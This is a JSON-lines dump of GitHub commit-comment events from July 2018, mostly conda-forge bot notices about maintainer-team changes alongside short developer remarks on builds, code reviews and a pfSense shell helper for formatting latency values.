{"id":"7992522787","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/azure-storage-common-feedstock"},"payload":{"comment":{"id":29773136,"position":null,"line":null,"path":null,"commit_id":"8bc17ba6a2a189d114dbf45bc1dc8a0435998c5f","created_at":"2018-07-20T02:01:35Z","updated_at":"2018-07-20T02:01:35Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @xhochy were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T02:01:35Z"}
{"id":"7992524935","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/azure-storage-file-feedstock"},"payload":{"comment":{"id":29773138,"position":null,"line":null,"path":null,"commit_id":"563de0c45771fcca18ba20d1ac3920fbaf8b2522","created_at":"2018-07-20T02:02:25Z","updated_at":"2018-07-20T02:02:25Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @xhochy were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T02:02:25Z"}
{"id":"7992529760","type":"CommitCommentEvent","actor":{"login":"FamousMai"},"repo":{"name":"FamousMai/laravel01"},"payload":{"comment":{"id":29773149,"position":null,"line":null,"path":null,"commit_id":"93081bd941e10802718ec3c836712603fcedd8bf","created_at":"2018-07-20T02:04:12Z","updated_at":"2018-07-20T02:04:12Z","author_association":"OWNER","body":"完成 第六章 用户注册"}},"created_at":"2018-07-20T02:04:12Z"}
{"id":"7992530790","type":"CommitCommentEvent","actor":{"login":"lainverse"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29773151,"position":null,"line":null,"path":null,"commit_id":"23206100198dfdd3c789773e953a232e442bdc48","created_at":"2018-07-20T02:04:39Z","updated_at":"2018-07-20T02:04:39Z","author_association":"NONE","body":"@okiehsch \r\nThanks, my updated code already uses this trick globally and uBO with latest filter list should work there as well (since rule runs on first-level domains)."}},"created_at":"2018-07-20T02:04:39Z"}
{"id":"7992531613","type":"CommitCommentEvent","actor":{"login":"Vierwood"},"repo":{"name":"Altemio/SevenKingdoms-master"},"payload":{"comment":{"id":29773155,"position":null,"line":null,"path":null,"commit_id":"259bb284a2517d0f80f43a827038a2500747da46","created_at":"2018-07-20T02:04:57Z","updated_at":"2018-07-20T02:04:57Z","author_association":"COLLABORATOR","body":"Not really when counts have as many men as kings. "}},"created_at":"2018-07-20T02:04:57Z"}
{"id":"7992531927","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29773156,"position":null,"line":null,"path":null,"commit_id":"5aed00ce594da09cbe4854fc5ad1641917dc2c58","created_at":"2018-07-20T02:05:05Z","updated_at":"2018-07-20T02:05:05Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (lgu1234) - x86_64-MacOS-10.9-clang: Tests Failed (2008 of 2944 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 2 tests had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: Table big diffs.\n * 2 tests had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 620\n * Failed: 3\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5aed00ce594da09cbe4854fc5ad1641917dc2c58-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5aed00ce594da09cbe4854fc5ad1641917dc2c58-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-68.21%25-red.png)</a> \n"}},"created_at":"2018-07-20T02:05:05Z"}
{"id":"7992533059","type":"CommitCommentEvent","actor":{"login":"takasimiz"},"repo":{"name":"takasimiz/Denolf17_EfProb"},"payload":{"comment":{"id":29773160,"position":null,"line":null,"path":null,"commit_id":"e8e3634f70ac6e9b48baf7aaa8940ca033ef549f","created_at":"2018-07-20T02:05:28Z","updated_at":"2018-07-20T02:05:28Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implement [Denolf et al. 17] with EfProb](https://trello.com/c/BsJuPrTk/125-implement-denolf-et-al-17-with-efprob)"}},"created_at":"2018-07-20T02:05:28Z"}
{"id":"7992543242","type":"CommitCommentEvent","actor":{"login":"agupta7"},"repo":{"name":"bbhopesh/EmailProject"},"payload":{"comment":{"id":29773176,"position":null,"line":null,"path":null,"commit_id":"612f1292b24ca3735bbc4d89877917779837c88f","created_at":"2018-07-20T02:09:28Z","updated_at":"2018-07-20T02:09:28Z","author_association":"NONE","body":"I don't think you need the mkdir bin line.  javac makes it automatically if it doesn't exist."}},"created_at":"2018-07-20T02:09:28Z"}
{"id":"7992543544","type":"CommitCommentEvent","actor":{"login":"g6123"},"repo":{"name":"g6123/certbot"},"payload":{"comment":{"id":29773178,"position":null,"line":null,"path":null,"commit_id":"e74505968ba24a364a5be70ef86bbe20620d17db","created_at":"2018-07-20T02:09:33Z","updated_at":"2018-07-20T02:09:33Z","author_association":"OWNER","body":"@DennisLoska What is the error message?"}},"created_at":"2018-07-20T02:09:33Z"}
{"id":"7992546836","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/azure-storage-nspkg-feedstock"},"payload":{"comment":{"id":29773185,"position":null,"line":null,"path":null,"commit_id":"c10d9df7d4ce5ca02dae47ba1d7bf14083d1fc30","created_at":"2018-07-20T02:10:50Z","updated_at":"2018-07-20T02:10:50Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @xhochy were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T02:10:50Z"}
{"id":"7992547927","type":"CommitCommentEvent","actor":{"login":"iVitan"},"repo":{"name":"rvagg/node-worker-farm"},"payload":{"comment":{"id":29773186,"position":null,"line":null,"path":null,"commit_id":"0b2349c6c7ed5c51e234e418fad226875313e773","created_at":"2018-07-20T02:11:15Z","updated_at":"2018-07-20T02:11:15Z","author_association":"NONE","body":"cant not  run `npm i -g npm`  on Termux\r\n\r\n"}},"created_at":"2018-07-20T02:11:15Z"}
{"id":"7992548662","type":"CommitCommentEvent","actor":{"login":"bbhopesh"},"repo":{"name":"bbhopesh/EmailProject"},"payload":{"comment":{"id":29773188,"position":null,"line":null,"path":null,"commit_id":"612f1292b24ca3735bbc4d89877917779837c88f","created_at":"2018-07-20T02:11:32Z","updated_at":"2018-07-20T02:11:32Z","author_association":"OWNER","body":"It was not creating for me and build was failing."}},"created_at":"2018-07-20T02:11:32Z"}
{"id":"7992548713","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/azure-storage-queue-feedstock"},"payload":{"comment":{"id":29773189,"position":null,"line":null,"path":null,"commit_id":"c8213ea34da44eb05702f5a0956e41bcfc262153","created_at":"2018-07-20T02:11:34Z","updated_at":"2018-07-20T02:11:34Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @xhochy were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T02:11:34Z"}
{"id":"7992550281","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/colorspacious-feedstock"},"payload":{"comment":{"id":29773194,"position":null,"line":null,"path":null,"commit_id":"a6abf402dfeb0499f76fb73f08f028679403beaf","created_at":"2018-07-20T02:12:12Z","updated_at":"2018-07-20T02:12:12Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @kthyng were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T02:12:12Z"}
{"id":"7992551746","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/divebomb-feedstock"},"payload":{"comment":{"id":29773200,"position":null,"line":null,"path":null,"commit_id":"6d55bbf04f086722817ab52ed3b2399656d0b2d2","created_at":"2018-07-20T02:12:49Z","updated_at":"2018-07-20T02:12:49Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @alexetnunes were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @alexetnunes were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T02:12:49Z"}
{"id":"7992552079","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29773202,"position":null,"line":null,"path":null,"commit_id":"564eb86a37f4f1eba9fbe51abc883d2cd9aa8932","created_at":"2018-07-20T02:12:59Z","updated_at":"2018-07-20T02:12:59Z","author_association":"OWNER","body":"Created multidev environment [tre#ci-66](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#ci-66).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-66-tre.pantheonsite.io/)"}},"created_at":"2018-07-20T02:12:59Z"}
{"id":"7992552949","type":"CommitCommentEvent","actor":{"login":"mavenjar"},"repo":{"name":"mavenjar/WebChat-master"},"payload":{"comment":{"id":29773203,"position":null,"line":null,"path":null,"commit_id":"62e95a91dd277e523c9285626a62cb0772cba111","created_at":"2018-07-20T02:13:20Z","updated_at":"2018-07-20T02:13:20Z","author_association":"OWNER","body":"back to last version"}},"created_at":"2018-07-20T02:13:20Z"}
{"id":"7992555798","type":"CommitCommentEvent","actor":{"login":"Stihdjia"},"repo":{"name":"Attnam/ivan"},"payload":{"comment":{"id":29773213,"position":null,"line":null,"path":null,"commit_id":"c296e8e680a30293a67f216811e2fb0460f9ccef","created_at":"2018-07-20T02:14:27Z","updated_at":"2018-07-20T02:14:27Z","author_association":"CONTRIBUTOR","body":"Thanks fejoa and AP =)"}},"created_at":"2018-07-20T02:14:27Z"}
{"id":"7992556712","type":"CommitCommentEvent","actor":{"login":"rooor201"},"repo":{"name":"ethereum/go-ethereum"},"payload":{"comment":{"id":29773219,"position":null,"line":null,"path":null,"commit_id":"32559ccad1e0519ce1decc4b90df021fe215a811","created_at":"2018-07-20T02:14:48Z","updated_at":"2018-07-20T02:14:48Z","author_association":"NONE","body":"V"}},"created_at":"2018-07-20T02:14:48Z"}
{"id":"7992557267","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29773222,"position":null,"line":null,"path":null,"commit_id":"7cf8aaea9fea3a34d10fd2e89ad713389e56190d","created_at":"2018-07-20T02:15:02Z","updated_at":"2018-07-20T02:15:02Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.235`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/235) :tada:"}},"created_at":"2018-07-20T02:15:02Z"}
{"id":"7992558504","type":"CommitCommentEvent","actor":{"login":"agupta7"},"repo":{"name":"bbhopesh/EmailProject"},"payload":{"comment":{"id":29773227,"position":null,"line":null,"path":null,"commit_id":"612f1292b24ca3735bbc4d89877917779837c88f","created_at":"2018-07-20T02:15:27Z","updated_at":"2018-07-20T02:15:27Z","author_association":"NONE","body":"That's strange... Might be jdk version thing then."}},"created_at":"2018-07-20T02:15:27Z"}
{"id":"7992562024","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29773232,"position":null,"line":null,"path":null,"commit_id":"7cf8aaea9fea3a34d10fd2e89ad713389e56190d","created_at":"2018-07-20T02:16:49Z","updated_at":"2018-07-20T02:16:49Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.356`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/406074181) :tada:"}},"created_at":"2018-07-20T02:16:49Z"}
{"id":"7992565141","type":"CommitCommentEvent","actor":{"login":"bbhopesh"},"repo":{"name":"bbhopesh/EmailProject"},"payload":{"comment":{"id":29773243,"position":null,"line":null,"path":null,"commit_id":"612f1292b24ca3735bbc4d89877917779837c88f","created_at":"2018-07-20T02:18:05Z","updated_at":"2018-07-20T02:18:05Z","author_association":"OWNER","body":"That's okay. I am changing all of this to move to gradle, so it doesn't matter. I will make few more commits tonight."}},"created_at":"2018-07-20T02:18:05Z"}
{"id":"7992571392","type":"CommitCommentEvent","actor":{"login":"alexstonehs"},"repo":{"name":"chkr1011/MQTTnet"},"payload":{"comment":{"id":29773251,"position":29,"line":354,"path":"Frameworks/MQTTnet.NetStandard/Server/MqttClientSession.cs","commit_id":"a10183628bf4abc80f0699695c58eaf81e48dace","created_at":"2018-07-20T02:20:31Z","updated_at":"2018-07-20T02:20:31Z","author_association":"NONE","body":"**at this point it should it process _keepAliveMonitor?.Resume() instead of _keepAliveMonitor?.Pause() ?**"}},"created_at":"2018-07-20T02:20:31Z"}
{"id":"7992571696","type":"CommitCommentEvent","actor":{"login":"agupta7"},"repo":{"name":"bbhopesh/EmailProject"},"payload":{"comment":{"id":29773252,"position":null,"line":null,"path":null,"commit_id":"612f1292b24ca3735bbc4d89877917779837c88f","created_at":"2018-07-20T02:20:38Z","updated_at":"2018-07-20T02:20:38Z","author_association":"NONE","body":"Can you keep makefile though.  I feel make is pretty standard way of compiling projects.  It could just kick off the gradle command."}},"created_at":"2018-07-20T02:20:38Z"}
{"id":"7992574128","type":"CommitCommentEvent","actor":{"login":"WKSefton"},"repo":{"name":"htdebeer/SVG-cards"},"payload":{"comment":{"id":29773256,"position":1,"line":1,"path":"Changelog","commit_id":"6006b7c0c87874e11cd10a205f5e85c4996b6577","created_at":"2018-07-20T02:21:39Z","updated_at":"2018-07-20T02:21:39Z","author_association":"NONE","body":"@htdebeer \r\nHello, Im a programming student and I have been playing with your deck of SVG cards in Angular 6. I took some time to fix some of the SVG artifacts in the indented file. Here is my current project page, work in progress, https://wksefton.github.io/. I would love to eventually learn how I can make this into a nice Angular module with functionality. I would like to contribute, please let me know how!"}},"created_at":"2018-07-20T02:21:39Z"}
{"id":"7992574140","type":"CommitCommentEvent","actor":{"login":"44uk"},"repo":{"name":"lisp719/nem-ruby"},"payload":{"comment":{"id":29773257,"position":null,"line":null,"path":null,"commit_id":"21334dc6b25628b1646ca2a427216cc5cbaf605f","created_at":"2018-07-20T02:21:40Z","updated_at":"2018-07-20T02:21:40Z","author_association":"NONE","body":"Thank you for your cooperation again!"}},"created_at":"2018-07-20T02:21:40Z"}
{"id":"7992574468","type":"CommitCommentEvent","actor":{"login":"seolhanKim"},"repo":{"name":"l4zyg33k/Microservices4ModernCommerce"},"payload":{"comment":{"id":29773258,"position":1,"line":1,"path":"03-chapter3.markdown","commit_id":"a1dd4a1588b6888cb79fb665905ecc63091c63ce","created_at":"2018-07-20T02:21:47Z","updated_at":"2018-07-20T02:21:47Z","author_association":"NONE","body":"기술은 마이크로서비스의 이로운 기능이지만, 정의된 특성은 아닙니다. 마이크로서비스는 주로 소형 빌딩, 다방면의 기업 비즈니스 팀과 관련이 있습니다. 흥미 있는 각 팀들은, 자연스레 최선의 기술로 자체 마이크로 소프트를 구축할 것입니다. 단일 마이크로서비스의 범위는 내부 작업이기에, Charter 3은 내부 아키텍처를 언급합니다\r\n\r\n기술면에서는, 대부분의 마이크로소프트 기술 에코시스템 내 것들은 마이크로소프트 실행에 필수는 아니며, 기술 스택만 을 이용해 마이크로서비스를 실행시킬 수도 있습니다. 다시 말해, 마이크로서비스는 특정 기술 보다, 조직구조에 관련 된 것 이라는 겁니다. 기술은 마이크로서비스를 규모에 맞게 조작할 수 있게 합니다. 적절한 모니터링 시스템을 통해서는 마이크로서비스, 버전, 문제 발생 가능 인스턴스를 식별할 수 있습니다.\r\n내/외부 아키텍처 소프트웨어의 대부분은 오픈소스입니다. 마이크로서비스는 해커 커뮤니티에서 만들어졌습니다. 기존 소프트웨어 공급업체는 해당 분야 관련 제품의 생산은 너무 느렸습니다. 내/외부 스택은 다양한 오픈소스 제품으로 구성되지만, 클라우드 공급업체는 일부 지원합니다.\r\n\r\n기업 내 대부분의 기술 조달은 중앙 집중화 되어있습니다. CIO는 특정 데이터베이스, 프로그래밍 언어 등을 선택하여, 조직 구성원에게 사용을 강요할 것입니다. 최소 비용으로 갖춰진 조직에는 해당 전략이 타당합니다. 조달 부서는 공급업체로부터 최선의 가격을 짜내 제품 전문 지식을 갖춘 팀을 만들 수도 있지만, 이는 특정 계층에 구성원이 집중된 수평적 계층화를 강요하기에 마이크로서비스의 원리에는 완전히 반하고, 팀 간 결합으로 개발 속도는 현저하게 느려지게 됩니다.\r\n\r\n오늘날 대부분의 기술 조달은 중앙 집중화 되어있는 반면, 마이크로서비스의 기술 조달은 분명하게 분산되어 있습니다. Chapter 2에서 논의된 바와 같이, 각 팀의 자체 스택 선택에는 충분한 자율성을 필요합니다. 이같은 자율성에는 운영 및 유지관리에 대한 책임이 수반되기에, 팀은 현명한 결정을 내려야만 합니다. 여유 있을 때, 새 버전 0.02프레임워크를 실행해 봐도 좋을 것 같습니다. 기존 기업의 기술 선택 자가 실제 기술자는 아니기떄문에, 조심스런 결정을 내리지않을 수도 있습니다.\r\n"}},"created_at":"2018-07-20T02:21:47Z"}
{"id":"7992574709","type":"CommitCommentEvent","actor":{"login":"botpadawan"},"repo":{"name":"timgrossmann/InstaPy"},"payload":{"comment":{"id":29773263,"position":null,"line":null,"path":null,"commit_id":"e64ca7e4eb70a083d057d1d6e2be06808079e384","created_at":"2018-07-20T02:21:53Z","updated_at":"2018-07-20T02:21:53Z","author_association":"NONE","body":"does not work using \r\nsession.follow_user_followers(['friend1', 'friend2', 'friend3'], amount=10, randomize=False)"}},"created_at":"2018-07-20T02:21:53Z"}
{"id":"7992575151","type":"CommitCommentEvent","actor":{"login":"bbhopesh"},"repo":{"name":"bbhopesh/EmailProject"},"payload":{"comment":{"id":29773265,"position":null,"line":null,"path":null,"commit_id":"612f1292b24ca3735bbc4d89877917779837c88f","created_at":"2018-07-20T02:22:05Z","updated_at":"2018-07-20T02:22:05Z","author_association":"OWNER","body":"Yeah yeah.. that's what I was going to do."}},"created_at":"2018-07-20T02:22:05Z"}
{"id":"7992577472","type":"CommitCommentEvent","actor":{"login":"RyanJava"},"repo":{"name":"tankeryang/banciyuan-downloader"},"payload":{"comment":{"id":29773274,"position":null,"line":null,"path":null,"commit_id":"9f9d0a0ef70cd71b5f3d2316cb32fc72fe361a57","created_at":"2018-07-20T02:23:00Z","updated_at":"2018-07-20T02:23:00Z","author_association":"NONE","body":"你好  双击后没有任何反应"}},"created_at":"2018-07-20T02:23:00Z"}
{"id":"7992579360","type":"CommitCommentEvent","actor":{"login":"alexstonehs"},"repo":{"name":"chkr1011/MQTTnet"},"payload":{"comment":{"id":29773278,"position":34,"line":359,"path":"Frameworks/MQTTnet.NetStandard/Server/MqttClientSession.cs","commit_id":"a10183628bf4abc80f0699695c58eaf81e48dace","created_at":"2018-07-20T02:23:48Z","updated_at":"2018-07-20T02:23:48Z","author_association":"NONE","body":"Save question above at OnAdapterReadingPacketCompleted fire event, should it reverse Pause() and Resume() call ?"}},"created_at":"2018-07-20T02:23:48Z"}
{"id":"7992580882","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/gwosc-feedstock"},"payload":{"comment":{"id":29773282,"position":null,"line":null,"path":null,"commit_id":"770df54003d56298e785f318dfaed89c897a5f3a","created_at":"2018-07-20T02:24:23Z","updated_at":"2018-07-20T02:24:23Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @duncanmmacleod were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T02:24:23Z"}
{"id":"7992581957","type":"CommitCommentEvent","actor":{"login":"luckman212"},"repo":{"name":"pfsense/pfsense"},"payload":{"comment":{"id":29773284,"position":null,"line":null,"path":null,"commit_id":"040a1579e474290abfc7a4a445e310ce8e462847","created_at":"2018-07-20T02:24:49Z","updated_at":"2018-07-20T02:24:49Z","author_association":"MEMBER","body":"Ok, but in the GUI, latency thresholds are defined in ms, so not even sure how a sub 1ms alarm can be set up? Seems like it should be consistent. I understand the argument you're making for usec, but then it should be usec everywhere, no?\r\n\r\nHow about adding a small helper function to `rc.gateway_alarm` like\r\n```\r\nprint_rtt() {\r\n  usec=$1\r\n  if [ \"$usec\" -lt \"1000\" ]; then\r\n    retval=\"${usec}us\"\r\n  else\r\n    retval=\"$( expr ${usec} / 1000 )ms\"\r\n  fi\r\n  echo $retval\r\n}\r\n\r\necho \">>> Gateway alarm: ${GW} (Addr:${alarm_addr} Alarm:${alarm_flag} RTT:$( print_rtt ${alarm_rtt} ) RTTsd:$( print_rt\r\nt ${alarm_rttsd} ) Loss:${alarm_loss}%)\"\r\n```"}},"created_at":"2018-07-20T02:24:49Z"}
{"id":"7992582329","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/ipyslurm-feedstock"},"payload":{"comment":{"id":29773285,"position":null,"line":null,"path":null,"commit_id":"dadf3f3d9c202d9dc67f7212c292bfe2450412d7","created_at":"2018-07-20T02:24:57Z","updated_at":"2018-07-20T02:24:57Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @auneri were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @auneri were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T02:24:57Z"}
{"id":"7992585256","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/mapclassify-feedstock"},"payload":{"comment":{"id":29773297,"position":null,"line":null,"path":null,"commit_id":"d45d067e60e1596606e467ff37f7da9712bbfdcc","created_at":"2018-07-20T02:26:08Z","updated_at":"2018-07-20T02:26:08Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @ljwolf were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @sjsrey, @ljwolf, @jorisvandenbossche were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T02:26:08Z"}
{"id":"7992586817","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/mlconjug-feedstock"},"payload":{"comment":{"id":29773302,"position":null,"line":null,"path":null,"commit_id":"c39b2e68705b2c77d5640a082a480cc4ff6237bf","created_at":"2018-07-20T02:26:44Z","updated_at":"2018-07-20T02:26:44Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @sekoud were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @sekoud were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T02:26:44Z"}
{"id":"7992589530","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/mlpack-feedstock"},"payload":{"comment":{"id":29773307,"position":null,"line":null,"path":null,"commit_id":"78a50dcb741af2e229db21092d5fc188cc55be97","created_at":"2018-07-20T02:27:45Z","updated_at":"2018-07-20T02:27:45Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @marcelotrevisani were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T02:27:45Z"}
{"id":"7992591552","type":"CommitCommentEvent","actor":{"login":"szymczdm"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29773310,"position":null,"line":null,"path":null,"commit_id":"9450abf6de8cae9956d1117fd65f86748c4c6105","created_at":"2018-07-20T02:28:36Z","updated_at":"2018-07-20T02:28:36Z","author_association":"COLLABORATOR","body":"Was the SubPackage branch not already finished and merged in?"}},"created_at":"2018-07-20T02:28:36Z"}
{"id":"7992598635","type":"CommitCommentEvent","actor":{"login":"dennypage"},"repo":{"name":"pfsense/pfsense"},"payload":{"comment":{"id":29773323,"position":null,"line":null,"path":null,"commit_id":"040a1579e474290abfc7a4a445e310ce8e462847","created_at":"2018-07-20T02:31:22Z","updated_at":"2018-07-20T02:31:22Z","author_association":"CONTRIBUTOR","body":"Yes, it should either be us everywhere or have selectable suffix like the bandwidth values do in limiters. I personally think that a selectable suffix with spelled out values (microseconds, milliseconds, seconds) would be clearer and easier to use than microseconds everywhere.\n\nDenny\n\n\n> On Jul 19, 2018, at 19:24, Luke Hamburg <notifications@github.com> wrote:\n> \n> Ok, but in the GUI, latency thresholds are defined in ms, so not even sure how a sub 1ms alarm can be set up? Seems like it should be consistent. I understand the argument you're making for usec, but then it should be usec everywhere, no?\n> \n> How about adding a small helper function to rc.gateway_alarm like\n> \n> print_rtt() {\n>   usec=$1\n>   if [ \"$usec\" -lt \"1000\" ]; then\n>     retval=\"${usec}us\"\n>   else\n>     retval=\"$( expr ${usec} / 1000 )ms\"\n>   fi\n>   echo $retval\n> }\n> \n> echo \">>> Gateway alarm: ${GW} (Addr:${alarm_addr} Alarm:${alarm_flag} RTT:$( print_rtt ${alarm_rtt} ) RTTsd:$( print_rt\n> t ${alarm_rttsd} ) Loss:${alarm_loss}%)\"\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n\n"}},"created_at":"2018-07-20T02:31:22Z"}
